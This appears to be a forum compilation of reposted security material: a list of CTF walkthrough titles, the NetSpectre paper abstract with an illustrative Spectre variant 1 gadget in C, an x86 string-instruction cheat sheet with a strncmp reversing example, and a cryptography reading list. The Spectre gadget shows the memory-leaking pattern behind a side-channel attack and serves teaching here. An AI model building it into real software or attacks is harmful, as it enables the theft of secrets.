Capture the Flag Challenges
posted in CTF Challenges on November 12, 2016 by Raj Chandel

Hack the Jarbas: 1 (CTF Challenge)
OverTheWire – Bandit Walkthrough (14-21)
Hack the Temple of Doom (CTF Challenge)
Hack the Golden Eye:1 (CTF Challenge)
Hack the FourAndSix (CTF Challenge)
Hack the Blacklight: 1 (CTF Challenge)
Hack the Basic Pentesting:2 VM (CTF Challenge)
Hack the Billu Box2 VM (Boot to Root)
Hack the Lin.Security VM (Boot to Root)
Hack The Toppo:1 VM (CTF Challenge)
Hack the Box Challenge: Ariekei Walkthrough
Hack the Violator (CTF Challenge)
OverTheWire – Bandit Walkthrough (1-14)
Hack the Teuchter VM (CTF Challenge)
Hack the Box Challenge: Enterprises Walkthrough
Hack the Box Challenge: Falafel Walkthrough
Hack the Box Challenge: Charon Walkthrough
Hack the PinkyPalace VM (CTF Challenge)
Hack the Box Challenge: Jail Walkthrough
Hack the Box Challenge: Nibble Walkthrough
Hack The Blackmarket VM (CTF Challenge)
Hack the Box: October Walkthrough
Hack The Box: Nineveh Walkthrough
Hack The Gemini Inc (CTF Challenge)
Hack The Vulnhub Pentester Lab: S2-052
Hack the Box Challenge: Sneaky Walkthrough
Hack the Box Challenge: Chatterbox Walkthrough
Hack the Box Challenge: Crimestoppers Walkthrough
Hack the Box Challenge: Jeeves Walkthrough
Hack the Trollcave VM (Boot to Root)
Hack the Box Challenge: Fluxcapacitor Walkthrough
Hack the Box Challenge: Tally Walkthrough
Hack the Box Challenge: Inception Walkthrough
Hack the Box Challenge Bashed Walkthrough
Hack the Box Challenge Kotarak Walkthrough
Hack the Box Challenge Lazy Walkthrough
Hack the Box Challenge: Optimum Walkthrough
Hack the Box Challenge: Brainfuck Walkthrough
Hack the Box Challenge: Europa Walkthrough
Hack the Box Challenge: Calamity Walkthrough
Hack the Box Challenge: Shrek Walkthrough
Hack the Box Challenge: Bank Walkthrough
Hack the BSides Vancouver:2018 VM (Boot2Root Challenge)
Hack the Box Challenge: Mantis Walkthrough
Hack the Box Challenge: Shocker Walkthrough
Hack the Box Challenge: Devel Walkthrough
Hack the Box Challenge: Granny Walkthrough
Hack the Box Challenge: Node Walkthrough
Hack the Box Challenge: Haircut Walkthrough
Hack the Box Challenge: Arctic Walkthrough
Hack the Box Challenge: Tenten Walkthrough
Hack the Box Challenge: Joker Walkthrough
Hack the Box Challenge: Popcorn Walkthrough
Hack the Box Challenge: Cronos Walkthrough
Hack the Box Challenge: Beep Walkthrough
Hack the Bob: 1.0.1 VM (CTF Challenge)
Hack the Box Challenge: Legacy Walkthrough
Hack the Box Challenge: Sense Walkthrough
Hack the Box Challenge: Solid State Walkthrough
Hack the Box Challenge: Apocalyst Walkthrough
Hack the Box Challenge: Mirai Walkthrough
Hack the Box Challenge: Grandpa Walkthrough
Hack the Box Challenge: Blue Walkthrough
Hack the Box Challenge: Lame Walkthrough
Hack the Box Challenge: Blocky Walkthrough
Hack the W1R3S.inc VM (CTF Challenge)
Hack the Vulnupload VM (CTF Challenge)
Hack the DerpNStink VM (CTF Challenge)
Hack the Game of Thrones VM (CTF Challenge)
Hack the C0m80 VM (Boot2root Challenge)
Hack the Bsides London VM 2017 (Boot2Root)
Hack the USV: 2017 (CTF Challenge)
Hack the Cyberry: 1 VM (Boot2Root Challenge)
Hack the Basic Penetration VM (Boot2Root Challenge)
Hack The Ether: EvilScience VM (CTF Challenge)
Hack the Depth VM (CTF Challenge)
Hack the G0rmint VM (CTF Challenge)
Hack the Covfefe VM (CTF Challenge)
Hack the Born2Root VM (CTF Challenge)
Hack the dina VM (CTF Challenge)
Hack the H.A.S.T.E. VM Challenge
Hack the RickdiculouslyEasy VM (CTF Challenge)
Hack the BTRSys1 VM (Boot2Root Challenge)
Hack the BTRSys: v2.1 VM (Boot2Root Challenge)
Hack the Bulldog VM (Boot2Root Challenge)
Hack the Lazysysadmin VM (CTF Challenge)
Hack the Zico2 VM (CTF Challenge)
Hack the Primer VM (CTF Challenge)
Hack the thewall VM (CTF Challenge)
Hack the IMF VM (CTF Challenge)
Hack the 6days VM (CTF Challenge)
Hack the 64base VM (CTF Challenge)
Hack the EW Skuzzy VM (CTF Challenge)
Hack the Analougepond VM (CTF Challenge)
Hack the Moria: 1.1 (CTF Challenge)
Hack the DonkeyDocker (CTF Challenge)
Hack the d0not5top VM (CTF Challenge)
Hack the Super Mario (CTF Challenge)
Hack the Defense Space VM (CTF Challenge)
Hack the billu: b0x VM (Boot2root Challenge)
Hack the Orcus VM (CTF Challenge)
Hack the Nightmare VM (CTF Challenge)
Hack the Bot challenge: Dexter (Boot2Root Challenge)
Hack the Fartknocker VM (CTF Challenge)
Hack the Pluck VM (CTF Challenge)
Hack the Sedna VM (CTF Challenge)
Hack the Quaoar VM (CTF Challenge)
Hack the Gibson VM (CTF Challenge)
Hack the Pipe VM (CTF Challenge)
Hack the USV VM (CTF Challenge)
Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)
Hack the Pentester Lab: from SQL injection to Shell VM
Hack the Padding Oracle Lab
Hack the Fortress VM (CTF Challenge)
Hack the Zorz VM (CTF Challenge)
Hack the Freshly VM (CTF Challenge)
Hack the Hackday Albania VM (CTF Challenge)
Hack the Necromancer VM (CTF Challenge)
Hack the Billy Madison VM (CTF Challenge)
Hack the Seattle VM (CTF Challenge)
Hack the SkyDog Con CTF 2016 – Catch Me If You Can VM
Hack Acid Reloaded VM (CTF Challenge)
Hack the Breach 2.1 VM (CTF Challenge)
Hack the Lord of the Root VM (CTF Challenge)
Hack the Acid VM (CTF Challenge)
Hack the SpyderSec VM (CTF Challenge)
Hack the VulOS 2.0 VM (CTF Challenge)
Hack the SickOS 1.1 VM (CTF Challenge)
Hack the Fristileaks VM (CTF Challenge)
Hack the NullByte VM (CTF Challenge)
Hack the Minotaur VM (CTF Challenge)
Hack the TommyBoy VM (CTF Challenge)
Hack the Breach 1.0 VM (CTF Challenge)
Hack the SkyDog VM (CTF Challenge)
Hack the Milnet VM (CTF Challenge)
Hack the Kevgir VM (CTF Challenge)
Hack the Simple VM (CTF Challenge)
Hack the SickOS 1.2 VM (CTF Challenge)
Hack the Sidney VM (CTF Challenge)
Hack the Stapler VM (CTF Challenge)
Hack the Droopy VM (CTF Challenge)
Hack the Mr. Robot VM (CTF Challenge)
Penetration Testing in PwnLab (CTF Challenge)
Hack the Skytower (CTF Challenge)
Hack the Kioptrix 5 (CTF Challenge)
Hack The Kioptrix Level-1.3 (Boot2Root Challenge)
Hack the Kioptrix Level-1.2 (Boot2Root Challenge)
Hack The Kioptrix Level-1.1 (Boot2Root Challenge)
Hack The Kioptrix Level-1
Hack the Troll-1 VM (Boot to Root)
Hack the Hackademic-RTB1 VM (Boot to Root)
Hack the De-ICE: S1.120 VM (Boot to Root)
Hack the pWnOS: 2.0 (Boot 2 Root Challenge)
Hack the pWnOS-1.0 (Boot To Root)

Sursa: http://www.hackingarticles.in/capture-flag-challenges/
-
-
-
Michael Schwarz, Graz University of Technology
Martin Schwarzl, Graz University of Technology
Moritz Lipp, Graz University of Technology
Daniel Gruss, Graz University of Technology

ABSTRACT
Speculative execution is a crucial cornerstone to the performance of modern processors. During speculative execution, the processor may perform operations the program usually would not perform. While the architectural effects and results of such operations are discarded if the speculative execution is aborted, microarchitectural side effects may remain. The recently published Spectre attacks exploit these side effects to read memory contents of other programs. However, Spectre attacks require some form of local code execution on the target system. Hence, systems where an attacker cannot run any code at all were, until now, thought to be safe.
In this paper, we present NetSpectre, a generic remote Spectre variant 1 attack. For this purpose, we demonstrate the first access-driven remote Evict+Reload cache attack over network, leaking 15 bits per hour. Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high-performance AVX-based covert channel that we use in our cache-free Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system. We verified that our NetSpectre attacks work in local-area networks as well as between virtual machines in the Google cloud.
NetSpectre marks a paradigm shift from local attacks, to remote attacks, exposing a much wider range and larger number of devices to Spectre attacks. Spectre attacks now must also be considered on devices which do not run any potentially attacker-controlled code at all. We show that especially in this remote scenario, attacks based on weaker gadgets which do not leak actual data, are still very powerful to break address-space layout randomization remotely. Several of the Spectre gadgets we discuss are more versatile than anticipated. In particular, value-thresholding is a technique we devise, which leaks a secret value without the typical bit selection mechanisms. We outline challenges for future research on Spectre attacks and Spectre mitigations.

Download: https://misc0110.net/web/files/netspectre.pdf
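For readers who have not seen one, the "Spectre variant 1" gadget the abstract refers to has a well-known shape. The C sketch below is the generic textbook bounds-check-bypass pattern, not code from the paper; the names (array1, array2, victim_function) are illustrative.

```c
#include <stdint.h>
#include <stddef.h>

/* Generic Spectre variant 1 (bounds-check bypass) gadget shape.
   Illustrative only; not taken from the NetSpectre paper. */
size_t  array1_size = 16;
uint8_t array1[16];
uint8_t array2[256 * 4096];          /* probe array: one cache line per byte value */
volatile uint8_t sink;

void victim_function(size_t x)
{
    if (x < array1_size) {           /* branch the CPU may mispredict */
        /* During misspeculation with an out-of-bounds x, a secret byte is read
           and leaves a cache footprint in array2 that can later be measured. */
        sink = array2[array1[x] * 4096];
    }
}
```

NetSpectre's contribution is triggering a gadget like this and measuring its microarchitectural footprint entirely over the network, via cache timing or the AVX-based covert channel mentioned above, instead of relying on local attacker-controlled code.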
-
Ophir Harpaz
Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re.
Jul 23

A Summary of x86 String Instructions

I have never managed to memorize all of x86 Assembly's string instructions — so I wrote a cheat sheet for myself. Then I thought other people may find it useful too, and so this cheat sheet is now a blog post. This is what you'll find here:
1. The logic behind x86 string instructions.
2. All the information from (1) squeezed into a table.
3. A real-life example.
Let's go.
Note: in order to understand this post, basic knowledge in x86 Assembly is required. I do not explain what registers are, how a string is represented in memory, etc.

The Logic

The Prefix + Instruction Combo
First, let's make the distinction between string instructions (MOVS, LODS, STOS, CMPS, SCAS) and repetition prefixes (REP, REPE, REPNE, REPZ, REPNZ). Repetition prefixes are meaningful only when preceding string instructions. They cause the specified instruction to repeat as long as certain conditions are met. These prefixes are also responsible for updating the relevant pointers after each iteration by the proper number of bytes. The possible combinations of prefixes and instructions are described in the following figure.
[Figure: Possible combinations of repetition prefixes (dark blue) and string instructions (light blue).]
Note: I exclude the INS, OUTS string instructions as I have rarely seen them.

Termination Conditions
REP: repeat until ECX equals 0.
REPE, REPZ: repeat until ECX equals 0 or the zero flag is cleared (i.e., repeat while ZF is set). The two prefixes mean exactly the same.
REPNE, REPNZ: repeat until ECX equals 0 or the zero flag is set (i.e., repeat while ZF is clear). The two prefixes mean exactly the same.

String Instructions
The instruction's first three letters tell us what it does. The "S" in all instructions stands for — how surprising — "String". Each of these instructions is followed by a letter representing the size to operate on: 'B' for byte, 'W' for word (2 bytes) and 'D' for double-word (4 bytes).
Some string instructions operate on two strings: the string pointed to by the ESI register (source string) and the string pointed to by the EDI register (destination string):
MOV moves data from the source string to the destination string.
CMP compares data between the source and destination strings (in x86, comparison is basically subtraction which affects the EFLAGS register).
[Figure: Strings pointed to by the ESI, EDI registers.]
Other string instructions operate on only one string:
LOD loads data from the string pointed to by ESI into EAX¹.
STO stores data from EAX¹ into the string pointed to by EDI.
SCA scans the data in the string pointed to by EDI and compares it to EAX¹ (again, along with affecting EFLAGS).
Notes:
1. I use EAX to refer to AL for byte operations, AX for word operations and EAX for double-word operations.
2. After each iteration, ESI and EDI are incremented if the direction flag is clear, and decremented if it is set.
[Figure: REPE CMPSB for Trump's Rescue.]

Cheat Sheet
[Figure: Cheat sheet for x86 Assembly's string instructions.]

A Real-Life Example
Lately, we started doing CTFs at work (Trusteer, IBM Security). I stumbled upon a crack-me challenge from reversing.kr which contained the following function. Try to think about what this function is while we reverse engineer it together.
The function receives three arguments and puts the third (arg_8) in ECX. If arg_8 equals zero, the function returns.
Otherwise, we prepare the other registers for a string instruction: the first argument, arg_0, is moved into EDI and EAX is set to zero. Now we have a REPNE SCASB: the string pointed to by EDI is scanned and each character is compared to zero, held by AL. This happens until ECX equals zero or until a null terminator is scanned. Practically speaking, this instruction aims at finding the length of the destination string.
If ECX ends up being zero (meaning a null terminator was not encountered), then ECX simply receives its original value back — arg_8. Otherwise, if the loop terminates due to a null character, ECX is set to the destination string's length (including the null character). In other words, ECX is set to Min{ECX, len(destination_string)}.
Now EDI is set to arg_0 and ESI is set to arg_4, and we have a REPE CMPSB: each character pointed to by EDI is compared to the corresponding one pointed to by ESI. This happens until ECX equals zero (namely, the destination string has been fully consumed) or until the zero flag is unset (namely, until a difference between the strings is detected).
Then, the last character in the EDI string is compared to the last character in the ESI string:
If they are equal — the function returns zero (ECX XORed with itself).
If the character in [ESI-1] has a higher ASCII value than the one in [EDI-1] — the function returns 0xffffffff, or -1. This happens when the source string is lexicographically bigger than the destination string.
Otherwise, the function returns NOT 0xfffffffe (its bitwise negation), which is 1.
I reverse-engineered the function at work and then went to a colleague to see how he was doing. To my surprise, his IDA recognized this function as strncmp. My version didn't. Argh.
strncmp displays a nice usage of string instructions, which makes it a nice function for practice. In any case, now you know how strncmp is implemented.

Sursa: https://medium.com/@ophirharpaz/a-summary-of-x86-string-instructions-87566a28c20c
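To connect the walkthrough to something you can compile, here is a minimal GCC/Clang inline-assembly sketch (mine, not from the article or the crack-me binary) of the REPNE SCASB step described above: AL holds the zero byte being searched for, RDI/EDI walks the destination string, and RCX/ECX counts down, which is exactly how the disassembly derives the string length.

```c
#include <stddef.h>

/* REPNE SCASB used as a strlen: scan forward (DF is clear per the calling
   convention), comparing each byte at [rdi] with AL (0) and decrementing rcx
   once per byte scanned, including the terminator. GCC/Clang, x86/x86-64. */
static size_t scasb_strlen(const char *s)
{
    const char *p = s;
    size_t count = (size_t)-1;        /* "as many iterations as it takes" */

    __asm__ volatile (
        "repne scasb"
        : "+D"(p), "+c"(count)        /* scasb advances RDI and decrements RCX */
        : "a"(0)                      /* AL = 0, the byte we are looking for */
        : "cc", "memory"
    );

    return ~count - 1;                /* bytes scanned minus the terminator */
}

/* Example: scasb_strlen("string instructions") == 19 */
```

The REPE CMPSB that follows in the disassembly is the same idea with two pointers: it stops at the first mismatching byte or once the count produced by the scan above is exhausted, which is why IDA recognizes the whole routine as strncmp.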
-
-
-
Awesome Crypto Papers
A curated list of cryptography papers, articles, tutorials and howtos for non-cryptographers.

Notes
The goal of this list is to provide educational reading material for different levels of cryptographic knowledge. I started it because my day job onboarding engineers at Cossack Labs includes educating them in cryptographic matters and giving advice on what to read on specific topics, and that involves finding the same materials repeatedly. Hopefully, it will be useful for someone else as well.
It is aimed at people who are using cryptography in higher-level security systems to implement database encryption, secure sharing, end-to-end encryption in various schemes, and who should understand how it works, how it fails and how it is attacked. It is not a list of notable / important / historically important papers (although many of them are here). It is not aimed at academics (who have a better grasp of what they need anyway), nor is it aimed at the systematic study of wanna-be cryptographers (who are better off following a structured approach under professional guidance).
It will be extended gradually as I find something of "must-have" value. Pull requests are very welcome.

Contents
Introducing people to data security and cryptography
Simple: cryptography for non-engineers
Brief engineer-oriented introductions
Specific topics
Hashing - important bits on modern and classic hashes.
Secret key cryptography - all things symmetric encryption.
Cryptoanalysis - attacking cryptosystems.
Public key cryptography: General and DLP - RSA, DH and other classic techniques.
Public key cryptography: Elliptic-curve crypto - ECC, with focus on practical cryptosystems.
Zero Knowledge Proofs - Proofs of knowledge and other non-revealing cryptosystems.
Math - useful math materials in cryptographic context.
Post-quantum cryptography - Cryptography in post-quantum period.
Books
Lectures and educational courses
Online crypto challenges

The list

Introducing people to data security and cryptography

Simple: cryptography for non-engineers
Nuts and Bolts of Encryption: A Primer for Policymakers.
Keys under Doormats - Or why cryptography shouldn't be backdoored, by an all-star committee of crypto researchers from around the world.

Brief introductions
An Overview of Cryptography - By Gary C. Kessler.
Using Encryption for Authentication in Large Networks - By Needham, Schroeder: this is where crypto-based auth starts.
Communication Theory of Secrecy Systems - Fundamental cryptography paper by Claude Shannon.

General cryptographic interest
Another Look at “Provable Security” - Inquiries into formalism and naive intuition behind security proofs, by Neal Koblitz et al.
The security impact of a new cryptographic library - Introductory paper on NaCl, discussing important aspects of implementing cryptography and using it as a larger building block in security systems, by Daniel J. Bernstein, Tanja Lange, Peter Schwabe.

Specific topics

Hashing
FIPS 198-1: HMACs - The Keyed-Hash Message Authentication Code FIPS document.
FIPS 202: SHA3 - SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions.
Birthday problem - The best simple explanation of the math behind the birthday attack.
On the Security of HMAC and NMAC Based on HAVAL, MD4, MD5, SHA-0 and SHA-1 - Security analysis of different legacy HMAC schemes by Jongsung Kim et al.
On the Security of Randomized CBC-MAC Beyond the Birthday Paradox Limit - Security of randomized CBC-MACs and a new construction that resists birthday paradox attacks and provably reaches full security, by E. Jaulmes et al.

Secret key cryptography
FIPS 197 - AES FIPS document.
List of proposed operation modes of AES - Maintained by NIST.
Recommendation for Block Cipher Modes of Operation: Methods and Techniques.
Stick figure guide to AES - If the stuff above was a bit hard or you're looking for a good laugh.
Cache timing attacks on AES - Example of designing a great practical attack on a cipher implementation, by Daniel J. Bernstein.
Cache Attacks and Countermeasures: the Case of AES - Side channel attacks on AES, another view, by Dag Arne Osvik, Adi Shamir and Eran Tromer.
Salsa20 family of stream ciphers - Broad explanation of the Salsa20 cipher by Daniel J. Bernstein.
New Features of Latin Dances: Analysis of Salsa, ChaCha, and Rumba - Analysis of the Salsa20 family of ciphers, by Jean-Philippe Aumasson et al.
ChaCha20-Poly1305 Cipher Suites for Transport Layer Security (TLS) - IETF Draft of the ciphersuite family, by Adam Langley et al.
AES submission document on Rijndael - Original Rijndael proposal by Joan Daemen and Vincent Rijmen.
Ongoing Research Areas in Symmetric Cryptography - Overview of ongoing research in secret key crypto and hashes by the ECRYPT Network of Excellence in Cryptology.
The Galois/Counter Mode of Operation (GCM) - Original paper introducing GCM, by David A. McGrew and John Viega.
The Security and Performance of the Galois/Counter Mode (GCM) of Operation - Design, analysis and security of GCM, and, more specifically, AES GCM mode, by David A. McGrew and John Viega.

Cryptoanalysis
Differential Cryptanalysis of Salsa20/8 - A great example of stream cipher cryptoanalysis, by Yukiyasu Tsunoo et al.
Slide Attacks on a Class of Hash Functions - Applying slide attacks (a typical cryptoanalysis technique for block ciphers) to hash functions, M. Gorski et al.
Self-Study Course in Block Cipher Cryptanalysis - Attempt to organize the existing literature of block-cipher cryptanalysis in a way that students can use to learn cryptanalytic techniques and ways to break new algorithms, by Bruce Schneier.
Statistical Cryptanalysis of Block Ciphers - By Pascal Junod.
Cryptoanalysis of block ciphers and protocols - By Elad Pinhas Barkan.

Public key cryptography: General and DLP
New Directions in Cryptography - Seminal paper by Diffie and Hellman, introducing public key cryptography and the key exchange/agreement protocol.
RFC 2631: Diffie-Hellman Key Agreement - An explanation of the Diffie-Hellman method in more engineering terms.
A Method for Obtaining Digital Signatures and Public-Key Cryptosystems - Original paper introducing the RSA algorithm.
RSA Algorithm - Rather educational explanation of every bit behind RSA.
Secure Communications Over Insecure Channels - Paper by R. Merkle, predated "New directions in cryptography" though it was published after it. The Diffie-Hellman key exchange is an implementation of such a Merkle system.
On the Security of Public Key Protocols - The Dolev-Yao model is a formal model used to prove properties of interactive cryptographic protocols.
How to Share a Secret - A safe method for sharing secrets.
Twenty Years of Attacks on the RSA Cryptosystem - Great inquiry into attacking RSA and its internals, by Dan Boneh.
Remote timing attacks are practical - An example of attacking a practical crypto implementation, by D. Boneh, D. Brumley.
The Equivalence Between the DHP and DLP for Elliptic Curves Used in Practical Applications, Revisited - by K. Bentahar.

Public key cryptography: Elliptic-curve crypto
Elliptic Curve cryptography: A gentle introduction.
Explain me like I'm 5: How digital signatures actually work - EdDSA explained with ease and elegance.
Elliptic Curve Cryptography: finite fields and discrete logarithms.
Detailed Elliptic Curve cryptography tutorial.
Elliptic Curve Cryptography: ECDH and ECDSA.
Elliptic Curve Cryptography: breaking security and a comparison with RSA.
Elliptic Curve Cryptography: the serpentine course of a paradigm shift - Historic inquiry into the development of ECC and its adoption.
Let's construct an elliptic curve: Introducing Crackpot2065 - Fine example of building up ECC from scratch.
Explicit-Formulas Database - For many elliptic curve representation forms.
Curve25519: new Diffie-Hellman speed records - Paper on Curve25519.
Software implementation of the NIST elliptic curves over prime fields - Practical example of implementing elliptic curve crypto, by M. Brown et al.
High-speed high-security signatures - Seminal paper on EdDSA signatures on the ed25519 curve by Daniel J. Bernstein et al.

Zero Knowledge Proofs
Proofs of knowledge - A pair of papers which investigate the notions of proof of knowledge and proof of computational ability, M. Bellare and O. Goldreich.
How to construct zero-knowledge proof systems for NP - Classic paper by Goldreich, Micali and Wigderson.
Proofs that yield nothing but their validity and a Methodology of Cryptographic protocol design - By Goldreich, Micali and Wigderson, a relative to the above.
A Survey of Noninteractive Zero Knowledge Proof System and Its Applications.
How to Prove a Theorem So No One Else Can Claim It - By Manuel Blum.
Information Theoretic Reductions among Disclosure Problems - Brassard et al.
Knowledge complexity of interactive proof systems - By Goldwasser, Micali and Rackoff. Defining the computational complexity of "knowledge" within zero knowledge proofs.
A Survey of Zero-Knowledge Proofs with Applications to Cryptography - Great intro to the original ZKP protocols.
Zero Knowledge Protocols and Small Systems - A good intro to zero knowledge protocols.

Key Management
Recommendation for Key Management – Part 1: General - Methodologically very relevant document on the goals and procedures of key management.

Math
PRIMES is in P - Unconditional deterministic polynomial-time algorithm that determines whether an input number is prime or composite.

Post-quantum cryptography
Post-quantum cryptography - dealing with the fallout of physics success - Brief observation of mathematical tasks that can be used to build cryptosystems secure against attacks by post-quantum computers.
Post-quantum cryptography - Introduction to post-quantum cryptography.
Post-quantum RSA - Daniel Bernstein's insight on how to save RSA in the post-quantum period.

Books
That seems somewhat out of scope, doesn't it? But these are books only fully available online for free. Read them as a sequence of papers if you will.
A Graduate Course in Applied Cryptography - By Dan Boneh and Victor Shoup. A well-balanced introductory course into cryptography, a bit of cryptoanalysis and cryptography-related security.
Analysis and design of cryptographic hash functions, MAC algorithms and block ciphers - Broad overview of the design and cryptoanalysis of various ciphers and hash functions, by Bart Van Rompay.
CrypTool book - Predominantly mathematically oriented information on learning, using and experimenting with cryptographic procedures.
Handbook of Applied Cryptography - By Alfred J. Menezes, Paul C. van Oorschot and Scott A. Vanstone. Good classical introduction into cryptography and ciphers.
The joy of Cryptography - By Mike Rosulek. A lot of basic stuff covered really well. No ECC.
A Computational Introduction to Number Theory and Algebra - By Victor Shoup, excellent starter book on the math universally used in cryptography.

Lectures and educational courses
Understanding cryptography: A textbook for Students and Practitioners - Textbook, great lectures and problems to solve.
Crypto101 - Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
A Course in Cryptography - Lecture notes by Rafael Pass, Abhi Shelat.
Lecture Notes on Cryptography - Famous set of lectures on cryptography by Shafi Goldwasser (MIT), M. Bellare (University of California).
Introduction to Cryptography by Christof Paar - Video course by Christof Paar (University of Bochum in Germany). In English.
Cryptography I - Stanford University course on Coursera, taught by prof. Dan Boneh. Cryptography II is still in development.

Online crypto challenges
Not exactly papers, but crypto challenges are awesome educational material.
Cryptopals crypto challenges.

License
To the extent possible under law, the author has waived all copyright and related or neighboring rights to this work.

Sursa: https://github.com/pFarb/awesome-crypto-papers
-
-